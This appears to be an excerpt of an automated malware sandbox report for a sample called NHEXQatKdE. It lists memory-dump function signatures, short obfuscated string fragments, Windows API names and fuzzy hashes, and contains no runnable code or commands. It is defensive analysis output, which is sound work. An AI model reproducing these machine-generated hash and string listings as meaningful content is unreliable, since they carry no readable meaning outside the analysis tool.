                                                                                                                                      • Source File: 00000004.00000002.2923052938.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_NHEXQatKdE.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: U%RV$Y%RV
                                                                                                                                      • API String ID: 0-3078678817
                                                                                                                                      • Opcode ID: 44c287b6a765d45ad14f4e35a36b47b38028d1a77870fc68b35162d1e83e6687
                                                                                                                                      • Instruction ID: 9be65e438420ebf15d9cec439849eff6f83a0ef22775a7fcda93cdc09bca5dfb
                                                                                                                                      • Opcode Fuzzy Hash: 44c287b6a765d45ad14f4e35a36b47b38028d1a77870fc68b35162d1e83e6687
                                                                                                                                      • Instruction Fuzzy Hash: B2212736F40121ABCF2DCA689D5067F32A2BB89314B69C53EC556E7398D6BC4C128758
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2923052938.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_NHEXQatKdE.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                      • String ID: ukwh
                                                                                                                                      • API String ID: 2994545307-439397672
                                                                                                                                      • Opcode ID: f805110f98b9d8d851302580950993c06ff1bc4161faed8018008cc96d8f365d
                                                                                                                                      • Instruction ID: 1c12de679d38134fe518265e9a98c8f0b1fb9366fd14f9cc503cd88489a69803
                                                                                                                                      • Opcode Fuzzy Hash: f805110f98b9d8d851302580950993c06ff1bc4161faed8018008cc96d8f365d
                                                                                                                                      • Instruction Fuzzy Hash: C61203367087409BD725CF28CC907ABB7A2EBD6354F2A892DD5D5873A1D634CC81CB89
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2923052938.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_NHEXQatKdE.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                      • String ID: f
                                                                                                                                      • API String ID: 2994545307-1993550816
                                                                                                                                      • Opcode ID: 7dd8048da2752b463430b5e789f6db5ed6f61dbbdd9a91fdd994969e8323d22a
                                                                                                                                      • Instruction ID: 51ff89207c3efd24be4c2d822e4595371369acb3077355d3c8dd438c2b5c7de3
                                                                                                                                      • Opcode Fuzzy Hash: 7dd8048da2752b463430b5e789f6db5ed6f61dbbdd9a91fdd994969e8323d22a
                                                                                                                                      • Instruction Fuzzy Hash: 202219366483518FC724CF28C88061BB7E2BBD9314F298A2EE8E5973D1D774DD158B86
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2923052938.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_NHEXQatKdE.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: "
                                                                                                                                      • API String ID: 0-123907689
                                                                                                                                      • Opcode ID: fb8ee4b108fe66e09d9a0fa8ce5c2bfb26b6f958e8b5f88b637ea2e6adb885a1
                                                                                                                                      • Instruction ID: f2e468da186f8178a6ac94a7e5d921651a2fbc2ec7c595dc77dc1c7e65b19277
                                                                                                                                      • Opcode Fuzzy Hash: fb8ee4b108fe66e09d9a0fa8ce5c2bfb26b6f958e8b5f88b637ea2e6adb885a1
                                                                                                                                      • Instruction Fuzzy Hash: 66C12472B083205BD724CE24E45076BB7D5AF84314F59892FEC958B382E778DC58879B
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2923052938.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_NHEXQatKdE.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: JpA
                                                                                                                                      • API String ID: 0-2896746996
                                                                                                                                      • Opcode ID: de15c6573bb26958078b58711e2181df24c25dd44ebc3f12e8158586849ad628
                                                                                                                                      • Instruction ID: 628aecb251d7578d8ceda7dbd1d199ed104b48374d7dfcb6dcb7d586fc436c33
                                                                                                                                      • Opcode Fuzzy Hash: de15c6573bb26958078b58711e2181df24c25dd44ebc3f12e8158586849ad628
                                                                                                                                      • Instruction Fuzzy Hash: FB51F336508360CFC7258F28D8507ABB3F0FF85318F06893DE869AB291D7349945D796
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2923052938.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_NHEXQatKdE.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: a,B
                                                                                                                                      • API String ID: 0-397882135
                                                                                                                                      • Opcode ID: c6c77c2a37431797a5b889b6ddf9573d9a60da64bfb438ecc2f112608d10dcd5
                                                                                                                                      • Instruction ID: 4c72702e9e110b51a533508b542ca48b91bf2946ed88cd9773777f0f27739761
                                                                                                                                      • Opcode Fuzzy Hash: c6c77c2a37431797a5b889b6ddf9573d9a60da64bfb438ecc2f112608d10dcd5
                                                                                                                                      • Instruction Fuzzy Hash: D34124B4911B109FD730EFAA8580026BBF0FF666147509A0DD4DA6FB29D3B6E4428F85
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2923052938.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_NHEXQatKdE.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: wabd
                                                                                                                                      • API String ID: 0-2209172042
                                                                                                                                      • Opcode ID: b256969568f27e7eccf79a6964726f95faab8ec0fbc375f13d21247278f7caff
                                                                                                                                      • Instruction ID: 6b17803e26d04ea86ae77970b07e285e4559b2ba8837a05b176f59465b4230cc
                                                                                                                                      • Opcode Fuzzy Hash: b256969568f27e7eccf79a6964726f95faab8ec0fbc375f13d21247278f7caff
                                                                                                                                      • Instruction Fuzzy Hash: 5D31347250D3904BC3158F3898502ABBBA2AFD3724F18DB6DE5D19B2D2D6358903879B
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2923052938.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_NHEXQatKdE.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                      • String ID: SRQP
                                                                                                                                      • API String ID: 2994545307-1594865775
                                                                                                                                      • Opcode ID: f6ef90930f04d19bed13613990256df59941f110705579771faf026c3645adf4
                                                                                                                                      • Instruction ID: 981fe634089efbbf062a6f174215e8c444f39d081bbaeda0c7f7d96a1115eeb0
                                                                                                                                      • Opcode Fuzzy Hash: f6ef90930f04d19bed13613990256df59941f110705579771faf026c3645adf4
                                                                                                                                      • Instruction Fuzzy Hash: 9A31D775B04300AFE7118B24EC41B7BB7E5EFCA714F246A2DE6C867291C274AC618749
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2923052938.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_NHEXQatKdE.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: RnB
                                                                                                                                      • API String ID: 0-4090840409
                                                                                                                                      • Opcode ID: 710232c9e352de35f9838718908f9bb31f3ac335a89b904feeda198a8f57df39
                                                                                                                                      • Instruction ID: 269c3bef7bed09dbc050cf92707b29f30e3b1e657cc235363ee96ee043105d36
                                                                                                                                      • Opcode Fuzzy Hash: 710232c9e352de35f9838718908f9bb31f3ac335a89b904feeda198a8f57df39
                                                                                                                                      • Instruction Fuzzy Hash: E2F0627570CA20CBD724CB11E65152FB7E1ABDA714F6556ADE88533701C238EC068BAE
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2923052938.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_NHEXQatKdE.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 27a42a59939d58b0a73be27afc638faaf152d1ca92e020dc2fc49d1790f1e8db
                                                                                                                                      • Instruction ID: 8faa173e7650551b3a6104ad273a14f8098c02f5c1787825874974823077173b
                                                                                                                                      • Opcode Fuzzy Hash: 27a42a59939d58b0a73be27afc638faaf152d1ca92e020dc2fc49d1790f1e8db
                                                                                                                                      • Instruction Fuzzy Hash: 0322C231A0C7118BD725DF18D8806ABB3E1BFC4319F19893ED986A7385D738B8518B87
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2923052938.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_NHEXQatKdE.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: f0b5b1b4a0beb7ebf6dfb77f3cabc98dd4db86f1918218b48f5c7098652c55da
                                                                                                                                      • Instruction ID: f92b5faa9d35bdea7f2291d8feb278b953cf00abd575da7c9a8ee3ebf1a23bbf
                                                                                                                                      • Opcode Fuzzy Hash: f0b5b1b4a0beb7ebf6dfb77f3cabc98dd4db86f1918218b48f5c7098652c55da
                                                                                                                                      • Instruction Fuzzy Hash: E2F1CD356087418FC724CF29C88062BFBE6EFD9300F08882EE5D597391E679E945CB96
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2923052938.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_NHEXQatKdE.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: c3b6358e092ecac39d1c472929cdd3e628cfc42c93c10eb60bd09af837cce2e4
                                                                                                                                      • Instruction ID: b91f3b7690443c95d2fb76b5951ba5c87ac490bd86f439cacb063572b9ad44f0
                                                                                                                                      • Opcode Fuzzy Hash: c3b6358e092ecac39d1c472929cdd3e628cfc42c93c10eb60bd09af837cce2e4
                                                                                                                                      • Instruction Fuzzy Hash: 9EB17BB260C7145FD734DF24888162BB7A1DBCA724F24A92ED5C963341D738EC01CB99
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2923052938.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_NHEXQatKdE.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 9f2ccb2bea4bf6c19290799c298238d7b837800e04c28cdc1f7d3dc0702add3b
                                                                                                                                      • Instruction ID: 23394277ef8040c1e30f15f8cd2efc30ccd225322cc90d418196611391988ba8
                                                                                                                                      • Opcode Fuzzy Hash: 9f2ccb2bea4bf6c19290799c298238d7b837800e04c28cdc1f7d3dc0702add3b
                                                                                                                                      • Instruction Fuzzy Hash: 1051F732B047105BC728DE3DDC9226BB7D2EBD9324F18662EE8A5973D1D6789C01C789
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2923052938.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_NHEXQatKdE.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: cafc9f8797b9e3e12007b6d2e2947618089e407aea4270bb9443aa5da376b6ab
                                                                                                                                      • Instruction ID: 9c7bb751a5460e5448bafc5a0c951509cef51987ee113d2cab9384d166c6b09f
                                                                                                                                      • Opcode Fuzzy Hash: cafc9f8797b9e3e12007b6d2e2947618089e407aea4270bb9443aa5da376b6ab
                                                                                                                                      • Instruction Fuzzy Hash: 8B5144B16117029BE3288F25C892716BBB2FF65308F24919CD1451FB96DBBB9417CF84
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2923052938.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_NHEXQatKdE.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: d43e13a5539f33f704f62bd30e0be2a5e9f99412b61026709753b2c5eb50e438
                                                                                                                                      • Instruction ID: 9dcd6aa5102db1afdbfa91f0de00c48066483fc8e768c13c23b2474ef312a5b2
                                                                                                                                      • Opcode Fuzzy Hash: d43e13a5539f33f704f62bd30e0be2a5e9f99412b61026709753b2c5eb50e438
                                                                                                                                      • Instruction Fuzzy Hash: EC213225B985914BC708CF3888A10BBFBD69BCF214F18E63E9452D7291CA28DD068788
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2923052938.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_NHEXQatKdE.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 572ceb69780f3392d41ca6c9e0603aef9c8fe904a06e13014da24633e2e49a2c
                                                                                                                                      • Instruction ID: 6a3541d2acb157ad4db1e9287bc40791a76c7a8463dbebd15c4b31474a67dff4
                                                                                                                                      • Opcode Fuzzy Hash: 572ceb69780f3392d41ca6c9e0603aef9c8fe904a06e13014da24633e2e49a2c
                                                                                                                                      • Instruction Fuzzy Hash: 7F11253050C3D08BDB228B2498603F7BFF0EF63324F14099EE2D19B282C3299552872B
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2923052938.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_NHEXQatKdE.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                      • Opcode ID: b4378fe9218695e9efab3cd03d4f9a3a61e28202572d20128c641435f14578e1
                                                                                                                                      • Instruction ID: 3786650eb146f7874297543a17454be3989082a0a873671d11c82bb5fd205540
                                                                                                                                      • Opcode Fuzzy Hash: b4378fe9218695e9efab3cd03d4f9a3a61e28202572d20128c641435f14578e1
                                                                                                                                      • Instruction Fuzzy Hash: 6811067970C520EBDB2A5B24E855A3F73A2FB95315FB0582ED54212211D335AC02CB9D
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2923052938.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_NHEXQatKdE.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: e3f69d2cddd8d1d41eb811920ce7bb414a30f77a1915c573363424695d72b567
                                                                                                                                      • Instruction ID: 2b7a75b310cf6e7c27b2cdf23322de32184d6ddae8fecbe38c3d0d7a708c7bc0
                                                                                                                                      • Opcode Fuzzy Hash: e3f69d2cddd8d1d41eb811920ce7bb414a30f77a1915c573363424695d72b567
                                                                                                                                      • Instruction Fuzzy Hash: 3401B1F270071157D720AE16F5C0B27B2A86F80708F58443EE84857342DBBDEC09E6A9
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2923052938.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_NHEXQatKdE.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 08d5f25956ec8e40c121eba7491b1c8ecd5884205fc160bc28c8dc4df6ad3e7b
                                                                                                                                      • Instruction ID: b072f2133b5b56dbc7795633f907e47fd0f6eaee5254b13e76233338d31dc155
                                                                                                                                      • Opcode Fuzzy Hash: 08d5f25956ec8e40c121eba7491b1c8ecd5884205fc160bc28c8dc4df6ad3e7b
                                                                                                                                      • Instruction Fuzzy Hash: 1FF0E51810C6E18EDB458F3894E13327FA19B03308F6CA49EC4C28B343C5268408CF68
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2923052938.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_NHEXQatKdE.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: "L!N$$A$C$2@$7\/^$DE$IF$K%H'$K-r/$LE$N)C+$Q9];$S1]3$Z5P7$^G$n+)$|!A#$KLM
                                                                                                                                      • API String ID: 0-1086502116
                                                                                                                                      • Opcode ID: 41c6464524ea21cedc8cdaad1baebf8af02fdaf39373aa5bb2e0ae742d3a71b2
                                                                                                                                      • Instruction ID: b5e3e3002248b422e105bd253f303610e53f33e8b3b095550b94881be720018d
                                                                                                                                      • Opcode Fuzzy Hash: 41c6464524ea21cedc8cdaad1baebf8af02fdaf39373aa5bb2e0ae742d3a71b2
                                                                                                                                      • Instruction Fuzzy Hash: 2181CCB86083908BD3309F25E85279BBBF0FF92704F15492DE5C99B352D7798941CB8A
                                                                                                                                      APIs
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2923052938.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_NHEXQatKdE.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: AllocString
                                                                                                                                      • String ID: $($,$/$0$6$;$@$[$_$h$t$v$w$z
                                                                                                                                      • API String ID: 2525500382-1320459350
                                                                                                                                      • Opcode ID: 74759230622c1fafdad58b18693dc4f0910fa6fc7d58cf1eee3d6dee53592b83
                                                                                                                                      • Instruction ID: e1250cad9f459cde51c8b94f344e925a183d72e4e1eb9be8baf593ca54fff1fc
                                                                                                                                      • Opcode Fuzzy Hash: 74759230622c1fafdad58b18693dc4f0910fa6fc7d58cf1eee3d6dee53592b83
                                                                                                                                      • Instruction Fuzzy Hash: 4191052150C7D18EE332C73C884879BBED15BA7228F084B9EE4ED5B2D2D7B945058767
                                                                                                                                      APIs
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2923052938.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_NHEXQatKdE.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: InitVariant
                                                                                                                                      • String ID: K$M$O$a$b$c$q$s$u$w$y${$}
                                                                                                                                      • API String ID: 1927566239-3974332
                                                                                                                                      • Opcode ID: 62173869f4b5f8ae6c41ea67a547a3728c53432e46bd58f5cc30ebd635a810a2
                                                                                                                                      • Instruction ID: 0880ca406e64cd27820feb041266c4c3ad1d07fce193fd926a63749628f74132
                                                                                                                                      • Opcode Fuzzy Hash: 62173869f4b5f8ae6c41ea67a547a3728c53432e46bd58f5cc30ebd635a810a2
                                                                                                                                      • Instruction Fuzzy Hash: 3F41377050C7C18ED325CB78845879FBFE1ABA6314F084A9DE4D94B3D2D6B98509C763
                                                                                                                                      APIs
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2923052938.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_NHEXQatKdE.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Variant$ClearInit
                                                                                                                                      • String ID: &$m$p
                                                                                                                                      • API String ID: 2610073882-1175575865
                                                                                                                                      • Opcode ID: fbbccc6316c81d781c046fa5f464a6966e20e8c2c4e7df863260449e87ccbe5d
                                                                                                                                      • Instruction ID: 0d9e2f7827293927a5cfb8656bdc0ef3d7868a73e2fca87288ca134e2872853a
                                                                                                                                      • Opcode Fuzzy Hash: fbbccc6316c81d781c046fa5f464a6966e20e8c2c4e7df863260449e87ccbe5d
                                                                                                                                      • Instruction Fuzzy Hash: 5A31D53050C7C18EC3619B38888869FBFE16BD7324F484A5DE5E64B2E2D7769049CB57
                                                                                                                                      APIs
                                                                                                                                      • FreeLibrary.KERNEL32(004087F9,00000010,00000000), ref: 0040B516
                                                                                                                                      • FreeLibrary.KERNEL32 ref: 0040B537
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2923052938.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_NHEXQatKdE.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: FreeLibrary
                                                                                                                                      • String ID: #v
                                                                                                                                      • API String ID: 3664257935-554117064
                                                                                                                                      • Opcode ID: 9b906d66826d2136dac62b423b22b071542d5574cb582e00250704552628795b
                                                                                                                                      • Instruction ID: d38886d6867fd7f1011bf2f878ec734edb1f1dccc7baf131d76c0f34bafdf9f4
                                                                                                                                      • Opcode Fuzzy Hash: 9b906d66826d2136dac62b423b22b071542d5574cb582e00250704552628795b
                                                                                                                                      • Instruction Fuzzy Hash: F2C00239414804AFCE027FB5FC1981C3A21BB5670571450BCB80570131DE634926EB1E